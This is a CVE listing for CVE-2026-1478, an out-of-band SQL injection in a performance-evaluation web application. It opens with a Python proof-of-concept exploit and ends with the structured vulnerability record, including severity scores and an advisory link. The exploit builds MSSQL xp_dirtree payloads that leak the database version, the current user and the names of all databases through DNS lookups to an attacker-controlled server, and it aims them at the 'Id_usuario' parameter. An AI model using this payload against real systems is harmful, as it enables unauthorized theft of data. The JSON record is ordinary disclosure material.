CVE-2026-1478

#!/usr/bin/env python3 """ CVE-2026-1478 - Quatuor Performance Evaluation SQL Injection PoC Note: This is for educational and authorized testing purposes only. """ import requests import urllib.parse TARGET_URL = "http://target-server/evaluacion_hca_evalua.aspx" ATTACKER_SERVER = "http://attacker-server/exfil" def build_oob_payload(sql_query): """ Build out-of-band SQL injection payload for MSSQL Uses xp_dirtree for DNS exfiltration """ # Encode SQL query and embed in DNS request encoded_query = sql_query.replace(" ", "+") # MSSQL OOB payload using xp_dirtree payload = f"';EXEC('xp_dirtree ''\\\\{encoded_query}.{ATTACKER_SERVER}''')--" return payload def exploit_sql_injection(): """ Exploit the SQL injection vulnerability """ # Example: Extract database version version_query = "SELECT @@VERSION" payload = build_oob_payload(version_query) params = { 'Id_usuario': payload, 'Id_evaluacion': '1' } print(f"[*] Sending malicious request to {TARGET_URL}") print(f"[*] Payload: {params['Id_usuario']}") try: response = requests.get(TARGET_URL, params=params, timeout=10) print(f"[+] Request sent. Check {ATTACKER_SERVER} for exfiltrated data.") except requests.RequestException as e: print(f"[-] Request failed: {e}") def extract_database_info(): """ Extract database name using OOB technique """ queries = [ "SELECT DB_NAME()", # Current database name "SELECT user", # Current user "SELECT name FROM master..sysdatabases" # All databases ] for query in queries: payload = build_oob_payload(query) params = { 'Id_usuario': payload, 'Id_evaluacion': '1' } requests.get(TARGET_URL, params=params, timeout=5) print(f"[*] Sent query: {query}") if __name__ == "__main__": print("CVE-2026-1478 SQL Injection PoC") print("=" * 50) exploit_sql_injection()

{"cve": {"id": "CVE-2026-1478", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:11.277", "lastModified": "2026-02-10T20:21:25.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' and 'Id_evaluacion’ in ‘/evaluacion_hca_evalua.aspx’, could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information."}, {"lang": "es", "value": "Una vulnerabilidad de inyección SQL fuera de banda (OOB SQLi) ha sido detectada en la aplicación de Evaluación del Desempeño (EDD) desarrollada por Gabinete Técnico de Programación. La explotación de esta vulnerabilidad en los parámetros 'Id_usuario' e 'Id_evaluacion' en '/evaluacion_hca_evalua.aspx' podría permitir a un atacante extraer información sensible de la base de datos a través de canales externos, sin que la aplicación afectada devuelva los datos directamente, comprometiendo la confidencialidad de la información almacenada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:*", "matchCriteriaId": "66ECBB1A-4822-4186-9C8B-49740C8B52A4"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/out-band-sql-injection-quatuor-performance-evaluation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}